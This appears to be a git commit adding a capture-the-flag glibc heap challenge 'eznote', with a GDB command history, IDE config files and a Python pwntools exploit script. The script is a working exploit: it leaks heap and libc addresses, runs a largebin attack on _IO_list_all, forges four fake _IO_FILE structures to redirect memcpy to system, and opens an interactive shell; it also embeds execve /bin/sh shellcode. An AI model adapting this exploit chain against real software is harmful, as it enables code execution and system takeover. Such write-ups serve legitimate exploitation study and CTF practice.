update

0d064da9 · _sky123_ · b2dec691 · 0d064da9 · 0d064da9 · 0d064da9
10 changed file
--- a/glibc_pwn/eznoted2b1405e/.gdb_history
+++ b/glibc_pwn/eznoted2b1405e/.gdb_history
+vmmap
+q
+vmmap
+p/x 0x7f431ff2d000-0x7f431ff54000
+p/x -0x7f431ff2d000+0x7f431ff54000
+p _IO_str_jumps 
+p &_IO_str_jumps 
+p/x 0x7f4320148640-0x7f431ff54000
+q
+got
+libc
+telescope 0x7f0c4f0a7000
+vmmap
+telescope 0x7f0c4f299000
+memcpyx/30i 0x7f0c4f2242c0
+x/30i 0x7f0c4f2242c0
+p memcpy
+x/20i 0x7f0c4f1458c0
+vmmap
+p/x 0x219160+0x7f0c4f0a7000
+telescope 0x7f0c4f2c0160
+vmmap
+p/x 0x7f0c4f0a7000+0x1F2160
+telescope 0x7f0c4f299160
+q
+c
+k
+p _IO_list_all 
+fp 0x557d0419bb90
+c
+k
+ni
+p fp
+ni
+bins
+ni
+bins
+ni
+bins
+telescope 0x557d0419cc40
+ni
+x/s 0x557d0419b010
+telescope 0x557d0419b010
+ni
+bins
+telescope 0x557d0419b010-0x10
+q
+c
+c
+n
+bins
+telescope 0x5569618e2c40-0x10
+ni
+telescope 0x5569618e1010
+telescope 0x5569618e2c40-0x10
+bins
+ni
+bins
+p __free_hook
+telescope 0x5569618e2c40-0x10
+ni
+telescope 0x5569618e2c40-0x10
+bins
+telescope 0x5569618e1010
+heap
+telescope 0x5569618e1010
+x/20gx 0x5569618e1010
+ni
+c
+ni
+bins
+niq
+q
+c
+c
+bins
+ni
+n
+bins
+n
+ni
+vmmap
+p fp
+p *fp
+ni
+c
+n
+k
+n
+bins
+ni
+ni
+p old_buf
+telescope 0x55ccca5b8790
+ni
+bins
+ni
+c
+ni
+n
+bins
+ni
+ni
+x/20i 0x7f2cf6e22cc0
+telescope 0x55ccca5b9830
+telescope 0x7f2cf6e9b150
+NI
+ni
+telescope 0x7f2cf6e9b150
+ni
+p fp
+p *fp
+ni
+ni
+n
+c
+n
+ni
+q
--- a/glibc_pwn/eznoted2b1405e/.idea/.gitignore
+++ b/glibc_pwn/eznoted2b1405e/.idea/.gitignore
+# 默认忽略的文件
+/shelf/
+/workspace.xml
--- a/glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
+++ b/glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="PYTHON_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="jdk" jdkName="Python 2.7" jdkType="Python SDK" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
\ No newline at end of file
--- a/glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
+++ b/glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
+<component name="InspectionProjectProfileManager">
+  <settings>
+    <option name="USE_PROJECT_PROFILE" value="false" />
+    <version value="1.0" />
+  </settings>
+</component>
\ No newline at end of file
--- a/glibc_pwn/eznoted2b1405e/.idea/misc.xml
+++ b/glibc_pwn/eznoted2b1405e/.idea/misc.xml
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" project-jdk-name="Python 2.7" project-jdk-type="Python SDK" />
+</project>
\ No newline at end of file
--- a/glibc_pwn/eznoted2b1405e/.idea/modules.xml
+++ b/glibc_pwn/eznoted2b1405e/.idea/modules.xml
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/eznoted2b1405e.iml" filepath="$PROJECT_DIR$/.idea/eznoted2b1405e.iml" />
+    </modules>
+  </component>
+</project>
\ No newline at end of file
--- a/glibc_pwn/eznoted2b1405e/eznote
+++ b/glibc_pwn/eznoted2b1405e/eznote
--- a/glibc_pwn/eznoted2b1405e/eznote.py
+++ b/glibc_pwn/eznoted2b1405e/eznote.py
+# _*_ coding:utf-8 _*_
+from pwn import *
+
+# context.log_level='debug'
+
+p = process("./eznote")
+elf = ELF("./eznote")
+libc = ELF("./libc.so.6")
+
+
+def dbg():
+    gdb.attach(p)
+    pause()
+
+
+# -----------------------------------------------------------------------------------------
+s = lambda data: p.send(str(data))
+sa = lambda text, data: p.sendafter(text, str(data))
+sl = lambda data: p.sendline(str(data))
+sla = lambda text, data: p.sendlineafter(text, str(data))
+r = lambda num=4096: p.recv(num)
+ru = lambda text: p.recvuntil(text)
+uu32 = lambda: u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))
+uu64 = lambda: u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))
+lg = lambda s: p.success('%s -> 0x%x' % (s, eval(s)))
+
+sh_x86_18 = "\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+sh_x86_20 = "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
+sh_x64_21 = "\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
+
+
+# https://www.exploit-db.com/shellcodes
+# -----------------------------------------------------------------------------------------
+
+def add(size, con):
+    sla("> ", 1)
+    sla("Size: ", size)
+    p.sendlineafter("Content: ", con)
+
+
+def edit(idx, con):
+    sla("> ", 3)
+    sla("Idx: ", idx)
+    p.sendlineafter("Content: ", con)
+
+
+def show(idx):
+    sla("> ", 4)
+    sla("Idx: ", idx)
+
+
+def dele(idx):
+    sla("> ", 2)
+    sla("Idx: ", idx)
+
+
+add(0x438, '0' * 0x438)  # 0
+add(0x408, '1' * 0x408)  # 1
+add(0x448, '2' * 0x448)  # 2
+add(0x418, '3' * 0x418)  # 3
+add(0x418, '4' * 0x418)  # 4
+
+add(0x408, '5' * 0x408)  # 5
+add(0x408, '6' * 0x408)  # 6
+add(0xca1, 'a')  # 7
+
+dele(0)
+dele(3)  # 0123
+
+add(0x438, 'a' * 0x438)  # 0
+add(0x408, 'a' * 0x400)  # 3-1
+
+dele(1)
+show(3)
+ru('Note3:\n')
+key = u64(p.recv(5).ljust(8, '\x00'))
+lg('key')
+heap_base = key << 12
+lg('heap_base')
+
+add(0x448, 'a' * 0x448)  # 1-2
+dele(4)  # 3and4
+add(0x838, 'a' * 0x838)  # 4-3and4
+
+dele(2)
+show(1)
+libc_base = libc.address = uu64() - 0x219ce0 + 0x27000
+log.info("libc base: " + hex(libc_base))
+IO_list_all = libc.sym['_IO_list_all']
+IO_str_jumps = libc.address + 0x1f4640
+memcpy_got = libc.address + 0x01F2160  # libc.got['memcpy']
+memset = libc.sym['memset']
+system = libc.sym['system']
+lg('IO_list_all')
+#gdb.attach(p,"b *_IO_flush_all_lockp\nb *_IO_str_overflow")
+#pause()
+# -----------------------------------------------------------------
+add(0x1000, 'a' * 0x1000)  # 2
+edit(1, p64(libc_base + 0x21a0e0+ 0x27000) * 2 + p64(0) + p64(IO_list_all - 0x20))
+dele(0)
+add(0x1000, 'a' * 0x1000)  # 0
+dele(0)
+add(0x438, 'a' * 0x438)  # 0
+# -----------------------------------------------------------------
+
+new_size = 0x408
+copy_heap_addr = heap_base + 0x10
+next_chain = heap_base + 0x2d00 - 0x10
+old_blen = (new_size - 100) // 2
+
+fake_IO_FILE = p64(0) * 2
+fake_IO_FILE += p64(0)  # _IO_write_base = 0
+fake_IO_FILE += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
+fake_IO_FILE += p64(0)
+fake_IO_FILE += p64(copy_heap_addr)  # _IO_buf_base
+fake_IO_FILE += p64(copy_heap_addr + old_blen)  # _IO_buf_end
+fake_IO_FILE = fake_IO_FILE.ljust(0x58, '\x00')
+fake_IO_FILE += p64(next_chain)  # _chain
+fake_IO_FILE = fake_IO_FILE.ljust(0x78, '\x00')
+fake_IO_FILE += p64(heap_base)  # _lock = writable address
+fake_IO_FILE = fake_IO_FILE.ljust(0xB0, '\x00')
+fake_IO_FILE += p64(0)  # _mode = 0
+fake_IO_FILE = fake_IO_FILE.ljust(0xC8, '\x00')
+fake_IO_FILE += p64(IO_str_jumps)  # vtable
+
+new_size = 0x288
+copy_heap_addr = heap_base + 0x790
+next_chain = heap_base + 0x2dd0 - 0x10
+old_blen = (new_size - 100) // 2
+
+fake_IO_FILE2 = p64(0) * 2
+fake_IO_FILE2 += p64(0)  # _IO_write_base = 0
+fake_IO_FILE2 += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
+fake_IO_FILE2 += p64(0)
+fake_IO_FILE2 += p64(copy_heap_addr)  # _IO_buf_base
+fake_IO_FILE2 += p64(copy_heap_addr + old_blen)  # _IO_buf_end
+fake_IO_FILE2 = fake_IO_FILE2.ljust(0x58, '\x00')
+fake_IO_FILE2 += p64(next_chain)  # _chain
+fake_IO_FILE2 = fake_IO_FILE2.ljust(0x78, '\x00')
+fake_IO_FILE2 += p64(heap_base)  # _lock = writable address
+fake_IO_FILE2 = fake_IO_FILE2.ljust(0xB0, '\x00')
+fake_IO_FILE2 += p64(0)  # _mode = 0
+fake_IO_FILE2 = fake_IO_FILE2.ljust(0xC8, '\x00')
+fake_IO_FILE2 += p64(IO_str_jumps)  # vtable
+
+new_size = 0x128
+copy_heap_addr = heap_base + 0x1830
+next_chain = heap_base + 0x2e90
+old_blen = (new_size - 100) // 2
+
+fake_IO_FILE3 = p64(0) * 2
+fake_IO_FILE3 += p64(0)  # _IO_write_base = 0
+fake_IO_FILE3 += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
+fake_IO_FILE3 += p64(0)
+fake_IO_FILE3 += p64(copy_heap_addr)  # _IO_buf_base
+fake_IO_FILE3 += p64(copy_heap_addr + old_blen)  # _IO_buf_end
+fake_IO_FILE3 = fake_IO_FILE3.ljust(0x58, '\x00')
+fake_IO_FILE3 += p64(next_chain)  # _chain
+fake_IO_FILE3 = fake_IO_FILE3.ljust(0x78, '\x00')
+fake_IO_FILE3 += p64(heap_base)  # _lock = writable address
+fake_IO_FILE3 = fake_IO_FILE3.ljust(0xB0, '\x00')
+fake_IO_FILE3 += p64(0)  # _mode = 0
+fake_IO_FILE3 = fake_IO_FILE3.ljust(0xC8, '\x00')
+fake_IO_FILE3 += p64(IO_str_jumps)  # vtable
+
+new_size = 0x108
+copy_heap_addr = libc_base
+next_chain = 0
+old_blen = (new_size - 100) // 2
+
+fake_IO_FILE4 = p64(0) * 2
+fake_IO_FILE4 += p64(0)  # _IO_write_base = 0
+fake_IO_FILE4 += p64(0xffffffffffffffff)  # _IO_write_ptr = 0xffffffffffffffff
+fake_IO_FILE4 += p64(0)
+fake_IO_FILE4 += p64(copy_heap_addr)  # _IO_buf_base
+fake_IO_FILE4 += p64(copy_heap_addr + old_blen)  # _IO_buf_end
+fake_IO_FILE4 = fake_IO_FILE4.ljust(0x58, '\x00')
+fake_IO_FILE4 += p64(next_chain)  # _chain
+fake_IO_FILE4 = fake_IO_FILE4.ljust(0x78, '\x00')
+fake_IO_FILE4 += p64(heap_base)  # _lock = writable address
+fake_IO_FILE4 = fake_IO_FILE4.ljust(0xB0, '\x00')
+fake_IO_FILE4 += p64(0)  # _mode = 0
+fake_IO_FILE4 = fake_IO_FILE4.ljust(0xC8, '\x00')
+fake_IO_FILE4 += p64(IO_str_jumps)  # vtable
+
+edit(3, p16(1) * 0x20 + p64(memcpy_got - 0x10) * 0x30)  # 0x780  # tcache struct data 0x40/0xd0
+
+edit(1, fake_IO_FILE)  # 0xb90 largebin
+edit(2, fake_IO_FILE2 + fake_IO_FILE3 + fake_IO_FILE4)  # 0x1000
+
+edit(5, '/bin/sh\x00' * 2 + p64(system) + '\x00' * 0x20 + p64(memset))  # 410
+dele(6)  # 0xc40
+
+sla("> ", 5)
+
+p.interactive()
--- a/glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
+++ b/glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
--- a/glibc_pwn/eznoted2b1405e/libc.so.6
+++ b/glibc_pwn/eznoted2b1405e/libc.so.6